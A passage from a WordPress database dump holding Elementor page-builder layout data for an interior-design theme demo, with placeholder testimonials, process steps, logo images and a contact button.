solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4229,4921,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4230,4921,'_elementor_pro_version','3.8.1'),(4231,4922,'_wp_page_template','elementor_header_footer'),(4232,4922,'_elementor_edit_mode','builder'),(4233,4922,'_elementor_template_type','wp-page'),(4234,4922,'_elementor_version','3.8.1'),(4235,4922,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\